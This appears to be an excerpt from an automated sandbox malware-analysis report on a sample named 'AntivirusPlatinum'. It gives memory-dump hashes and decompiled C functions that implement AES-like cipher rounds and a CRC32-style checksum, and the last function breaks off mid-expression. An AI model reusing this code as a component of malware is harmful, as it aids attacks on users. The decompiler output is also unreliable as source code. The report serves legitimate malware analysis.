                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f47b40baf411e24a56174d0a2faf233069d8d5316453ed0ac0ba42447a5e2899
                                                                                                                                                              • Instruction ID: 5d2bc7e4f08e954521d2575b6f364abe5586a069ccf0d2dd76d7a464feb089a4
                                                                                                                                                              • Opcode Fuzzy Hash: f47b40baf411e24a56174d0a2faf233069d8d5316453ed0ac0ba42447a5e2899
                                                                                                                                                              • Instruction Fuzzy Hash: AE81CF1620E2E18EE71AC73C14A85F73ED20F72104B2E44EE84CE5B2D7D8650A6AC66D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00409B36(void* __ecx, void* __eflags, char _a4, signed int* _a8) {
                                                                                                                                                              				signed int _v5;
                                                                                                                                                              				signed int _v6;
                                                                                                                                                              				signed int _v7;
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				signed int _v9;
                                                                                                                                                              				signed int _v10;
                                                                                                                                                              				signed int _v11;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				signed int _v13;
                                                                                                                                                              				signed int _v14;
                                                                                                                                                              				signed int _v15;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				signed int _v17;
                                                                                                                                                              				signed int _v18;
                                                                                                                                                              				signed int _v19;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				void* _t242;
                                                                                                                                                              				void* _t268;
                                                                                                                                                              				signed int* _t270;
                                                                                                                                                              
                                                                                                                                                              				_t268 = __ecx;
                                                                                                                                                              				E00409970( &_v20, _a4, __ecx + 0xb4);
                                                                                                                                                              				_t270 = _a8;
                                                                                                                                                              				 *_t270 =  *(0x4178a8 + (_v20 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v7 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v10 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v13 & 0x000000ff) * 4);
                                                                                                                                                              				_t270[1] =  *(0x4178a8 + (_v16 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v19 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v6 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v9 & 0x000000ff) * 4);
                                                                                                                                                              				_t270[2] =  *(0x4178a8 + (_v12 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v15 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v18 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v5 & 0x000000ff) * 4);
                                                                                                                                                              				_t242 = _t268 + 0xa4;
                                                                                                                                                              				_t270[3] =  *(0x4178a8 + (_v8 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v11 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v14 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v17 & 0x000000ff) * 4);
                                                                                                                                                              				_a4 = 8;
                                                                                                                                                              				do {
                                                                                                                                                              					E00409970( &_v20, _t270, _t242);
                                                                                                                                                              					 *_t270 =  *(0x4178a8 + (_v20 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v7 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v10 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v13 & 0x000000ff) * 4);
                                                                                                                                                              					_t270[1] =  *(0x4178a8 + (_v16 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v19 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v6 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v9 & 0x000000ff) * 4);
                                                                                                                                                              					_t270[2] =  *(0x4178a8 + (_v12 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v15 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v18 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v5 & 0x000000ff) * 4);
                                                                                                                                                              					_t242 = _t242 - 0x10;
                                                                                                                                                              					_t109 =  &_a4;
                                                                                                                                                              					 *_t109 = _a4 - 1;
                                                                                                                                                              					_t270[3] =  *(0x4178a8 + (_v8 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v11 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v14 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v17 & 0x000000ff) * 4);
                                                                                                                                                              				} while ( *_t109 != 0);
                                                                                                                                                              				E00409970( &_v20, _t270, _t268 + 0x24);
                                                                                                                                                              				_t115 = (_v20 & 0x000000ff) + 0x418cc8; // 0x8239e37c
                                                                                                                                                              				 *_t270 =  *_t115;
                                                                                                                                                              				_t270[0] =  *((intOrPtr*)((_v7 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[0] =  *((intOrPtr*)((_v10 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[0] =  *((intOrPtr*)((_v13 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t126 = (_v16 & 0x000000ff) + 0x418cc8; // 0xd56a0952
                                                                                                                                                              				_t270[1] =  *_t126;
                                                                                                                                                              				_t270[1] =  *((intOrPtr*)((_v19 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[1] =  *((intOrPtr*)((_v6 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[1] =  *((intOrPtr*)((_v9 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t138 = (_v12 & 0x000000ff) + 0x418cc8; // 0xd56a0952
                                                                                                                                                              				_t270[2] =  *_t138;
                                                                                                                                                              				_t270[2] =  *((intOrPtr*)((_v15 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[2] =  *((intOrPtr*)((_v18 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[2] =  *((intOrPtr*)((_v5 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[3] =  *((intOrPtr*)((_v8 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[3] =  *((intOrPtr*)((_v11 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[3] =  *((intOrPtr*)((_v14 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				_t270[3] =  *((intOrPtr*)((_v17 & 0x000000ff) + 0x418cc8));
                                                                                                                                                              				return E00409970(_t270, _t270, _t268 + 0x14);
                                                                                                                                                              			}






















                                                                                                                                                              0x00409b3f
                                                                                                                                                              0x00409b4f
                                                                                                                                                              0x00409b80
                                                                                                                                                              0x00409b87
                                                                                                                                                              0x00409bb5
                                                                                                                                                              0x00409be4
                                                                                                                                                              0x00409c0f
                                                                                                                                                              0x00409c15
                                                                                                                                                              0x00409c18
                                                                                                                                                              0x00409c1f
                                                                                                                                                              0x00409c25
                                                                                                                                                              0x00409c5a
                                                                                                                                                              0x00409c88
                                                                                                                                                              0x00409cb7
                                                                                                                                                              0x00409ce2
                                                                                                                                                              0x00409ce5
                                                                                                                                                              0x00409ce5
                                                                                                                                                              0x00409ce8
                                                                                                                                                              0x00409ce8
                                                                                                                                                              0x00409cfa
                                                                                                                                                              0x00409d03
                                                                                                                                                              0x00409d09
                                                                                                                                                              0x00409d15
                                                                                                                                                              0x00409d22
                                                                                                                                                              0x00409d2f
                                                                                                                                                              0x00409d36
                                                                                                                                                              0x00409d3c
                                                                                                                                                              0x00409d49
                                                                                                                                                              0x00409d56
                                                                                                                                                              0x00409d63
                                                                                                                                                              0x00409d6a
                                                                                                                                                              0x00409d70
                                                                                                                                                              0x00409d7d
                                                                                                                                                              0x00409d8a
                                                                                                                                                              0x00409d97
                                                                                                                                                              0x00409da4
                                                                                                                                                              0x00409db1
                                                                                                                                                              0x00409dbe
                                                                                                                                                              0x00409dd1
                                                                                                                                                              0x00409ddd

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7327f78a1deb69ccabe1a6d40b77589da036301b0cba6a48ce36b16b58229863
                                                                                                                                                              • Instruction ID: 7a05ca3c6aa45f7c0c3d5be354b359d1162ea9d394a588887a6fdbb73b53b832
                                                                                                                                                              • Opcode Fuzzy Hash: 7327f78a1deb69ccabe1a6d40b77589da036301b0cba6a48ce36b16b58229863
                                                                                                                                                              • Instruction Fuzzy Hash: AE914D648192D46ECB029FB594608FABFF0DE1B211B0E84DEE4E997293D138D364DB74
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E004099A2(intOrPtr __ecx, signed int _a4) {
                                                                                                                                                              				signed int* _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				signed char _v29;
                                                                                                                                                              				signed char _v30;
                                                                                                                                                              				signed char _v31;
                                                                                                                                                              				signed char _v32;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				signed int _v41;
                                                                                                                                                              				signed int _v42;
                                                                                                                                                              				signed int _v43;
                                                                                                                                                              				signed int _v44;
                                                                                                                                                              				signed int _t60;
                                                                                                                                                              				char* _t64;
                                                                                                                                                              				signed int _t65;
                                                                                                                                                              				signed int _t70;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              				void* _t74;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              				void* _t91;
                                                                                                                                                              				void* _t97;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              
                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                              				E0040A2B6(__ecx,  &_v44, _a4, 0x20);
                                                                                                                                                              				_t60 = 0;
                                                                                                                                                              				_t72 = 0;
                                                                                                                                                              				_a4 = 0;
                                                                                                                                                              				_t65 = 0;
                                                                                                                                                              				_t73 = 4;
                                                                                                                                                              				while(_t60 <= 0xa) {
                                                                                                                                                              					if(_t65 >= _t73) {
                                                                                                                                                              						L6:
                                                                                                                                                              						_t97 = _t72 - _t73;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v8 = _t91 + _t65 * 4 - 0x28;
                                                                                                                                                              						while(_t72 < _t73) {
                                                                                                                                                              							_v8 = _v8 + _t73;
                                                                                                                                                              							_t65 = _t65 + 1;
                                                                                                                                                              							_t72 = _t72 + 1;
                                                                                                                                                              							asm("movsd");
                                                                                                                                                              							if(_t65 < _t73) {
                                                                                                                                                              								continue;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L6;
                                                                                                                                                              							}
                                                                                                                                                              							goto L7;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L7:
                                                                                                                                                              					if(_t97 == 0) {
                                                                                                                                                              						_t60 = _t60 + 1;
                                                                                                                                                              						_a4 = _t60;
                                                                                                                                                              						_t72 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t65 < _t73) {
                                                                                                                                                              						continue;
                                                                                                                                                              					} else {
                                                                                                                                                              						if(_t60 <= 0xa) {
                                                                                                                                                              							_v8 = 0x418ca8;
                                                                                                                                                              							do {
                                                                                                                                                              								_v43 = _v43 ^  *((_v30 & 0x000000ff) + 0x418dc8);
                                                                                                                                                              								_v42 = _v42 ^  *((_v29 & 0x000000ff) + 0x418dc8);
                                                                                                                                                              								_v41 = _v41 ^  *((_v32 & 0x000000ff) + 0x418dc8);
                                                                                                                                                              								_v8 =  &(_v8[0]);
                                                                                                                                                              								_v44 = _v44 ^  *((_v31 & 0x000000ff) + 0x418dc8) ^  *_v8;
                                                                                                                                                              								_t64 =  &_v40;
                                                                                                                                                              								_t74 = 3;
                                                                                                                                                              								do {
                                                                                                                                                              									_t85 = 0;
                                                                                                                                                              									do {
                                                                                                                                                              										 *(_t64 + _t85) =  *(_t64 + _t85) ^  *(_t64 + _t85 - 4);
                                                                                                                                                              										_t85 = _t85 + 1;
                                                                                                                                                              									} while (_t85 < _t73);
                                                                                                                                                              									_t64 = _t64 + _t73;
                                                                                                                                                              									_t74 = _t74 - 1;
                                                                                                                                                              								} while (_t74 != 0);
                                                                                                                                                              								_t70 = 0;
                                                                                                                                                              								while(_a4 <= 0xa) {
                                                                                                                                                              									if(_t70 >= _t73) {
                                                                                                                                                              										L22:
                                                                                                                                                              										_t110 = _t72 - _t73;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t60 = _t91 + _t70 * 4 - 0x28;
                                                                                                                                                              										while(_t72 < _t73) {
                                                                                                                                                              											_t70 = _t70 + 1;
                                                                                                                                                              											_t60 = _t60 + _t73;
                                                                                                                                                              											_t72 = _t72 + 1;
                                                                                                                                                              											asm("movsd");
                                                                                                                                                              											if(_t70 < _t73) {
                                                                                                                                                              												continue;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L22;
                                                                                                                                                              											}
                                                                                                                                                              											goto L23;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									L23:
                                                                                                                                                              									if(_t110 == 0) {
                                                                                                                                                              										_a4 = _a4 + 1;
                                                                                                                                                              										_t72 = 0;
                                                                                                                                                              									}
                                                                                                                                                              									if(_t70 < _t73) {
                                                                                                                                                              										continue;
                                                                                                                                                              									} else {
                                                                                                                                                              										goto L26;
                                                                                                                                                              									}
                                                                                                                                                              									goto L27;
                                                                                                                                                              								}
                                                                                                                                                              								goto L27;
                                                                                                                                                              								L26:
                                                                                                                                                              							} while (_a4 <= 0xa);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				L27:
                                                                                                                                                              				return _t60;
                                                                                                                                                              			}

























                                                                                                                                                              0x004099b4
                                                                                                                                                              0x004099b7
                                                                                                                                                              0x004099bc
                                                                                                                                                              0x004099c0
                                                                                                                                                              0x004099c2
                                                                                                                                                              0x004099c5
                                                                                                                                                              0x004099c7
                                                                                                                                                              0x004099c8
                                                                                                                                                              0x004099d3
                                                                                                                                                              0x004099f7
                                                                                                                                                              0x004099f7
                                                                                                                                                              0x004099d5
                                                                                                                                                              0x004099d9
                                                                                                                                                              0x004099dc
                                                                                                                                                              0x004099ed
                                                                                                                                                              0x004099f0
                                                                                                                                                              0x004099f1
                                                                                                                                                              0x004099f4
                                                                                                                                                              0x004099f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004099f5
                                                                                                                                                              0x004099dc
                                                                                                                                                              0x004099f9
                                                                                                                                                              0x004099f9
                                                                                                                                                              0x004099fb
                                                                                                                                                              0x004099fc
                                                                                                                                                              0x004099ff
                                                                                                                                                              0x004099ff
                                                                                                                                                              0x00409a03
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409a05
                                                                                                                                                              0x00409a08
                                                                                                                                                              0x00409a0e
                                                                                                                                                              0x00409a15
                                                                                                                                                              0x00409a30
                                                                                                                                                              0x00409a3d
                                                                                                                                                              0x00409a4b
                                                                                                                                                              0x00409a4e
                                                                                                                                                              0x00409a53
                                                                                                                                                              0x00409a56
                                                                                                                                                              0x00409a59
                                                                                                                                                              0x00409a5a
                                                                                                                                                              0x00409a5a
                                                                                                                                                              0x00409a5c
                                                                                                                                                              0x00409a60
                                                                                                                                                              0x00409a63
                                                                                                                                                              0x00409a64
                                                                                                                                                              0x00409a68
                                                                                                                                                              0x00409a6a
                                                                                                                                                              0x00409a6a
                                                                                                                                                              0x00409a6d
                                                                                                                                                              0x00409a6f
                                                                                                                                                              0x00409a77
                                                                                                                                                              0x00409a99
                                                                                                                                                              0x00409a99
                                                                                                                                                              0x00409a79
                                                                                                                                                              0x00409a79
                                                                                                                                                              0x00409a7d
                                                                                                                                                              0x00409a90
                                                                                                                                                              0x00409a91
                                                                                                                                                              0x00409a93
                                                                                                                                                              0x00409a96
                                                                                                                                                              0x00409a97
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409a97
                                                                                                                                                              0x00409a7d
                                                                                                                                                              0x00409a9b
                                                                                                                                                              0x00409a9b
                                                                                                                                                              0x00409a9d
                                                                                                                                                              0x00409aa0
                                                                                                                                                              0x00409aa0
                                                                                                                                                              0x00409aa4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409aa4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409aa6
                                                                                                                                                              0x00409aa6
                                                                                                                                                              0x00409a15
                                                                                                                                                              0x00409a08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409a03
                                                                                                                                                              0x00409ab4
                                                                                                                                                              0x00409ab4

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0f1e198a405bd47bcbd999037dcf98d9ca0490093b358bc2e120bb77b8d572e2
                                                                                                                                                              • Instruction ID: 8db506cccaca7ad31332262a737b3017699621a350de5aec0ff0f078f6a8288b
                                                                                                                                                              • Opcode Fuzzy Hash: 0f1e198a405bd47bcbd999037dcf98d9ca0490093b358bc2e120bb77b8d572e2
                                                                                                                                                              • Instruction Fuzzy Hash: 7931C872A002D59ECF158FB594905EEBFB1DE69328F29807FC88177282D2355D86CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402CC5(signed char _a4, signed char _a8, unsigned int _a12) {
                                                                                                                                                              				signed char _t28;
                                                                                                                                                              				signed char _t30;
                                                                                                                                                              				signed char _t53;
                                                                                                                                                              				void* _t54;
                                                                                                                                                              				unsigned int _t71;
                                                                                                                                                              				unsigned int _t74;
                                                                                                                                                              
                                                                                                                                                              				if( *0x4141c4 == 0) {
                                                                                                                                                              					E00402C9B();
                                                                                                                                                              				}
                                                                                                                                                              				_t53 = _a8;
                                                                                                                                                              				_t28 = _a4;
                                                                                                                                                              				_t74 = _a12;
                                                                                                                                                              				while(_t74 > 0 && (_t53 & 0x00000007) != 0) {
                                                                                                                                                              					_t28 = _t28 >> 0x00000008 ^  *(0x4141c0 + ( *_t53 & 0x000000ff ^ _t28 & 0x000000ff) * 4);
                                                                                                                                                              					_t74 = _t74 - 1;
                                                                                                                                                              					_t53 = _t53 + 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t74 >= 8) {
                                                                                                                                                              					_t71 = _t74 >> 3;
                                                                                                                                                              					do {
                                                                                                                                                              						_t30 = _t28 ^  *_t53;
                                                                                                                                                              						_t53 = _t53 + 8;
                                                                                                                                                              						_t74 = _t74 - 8;
                                                                                                                                                              						_t28 = (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) 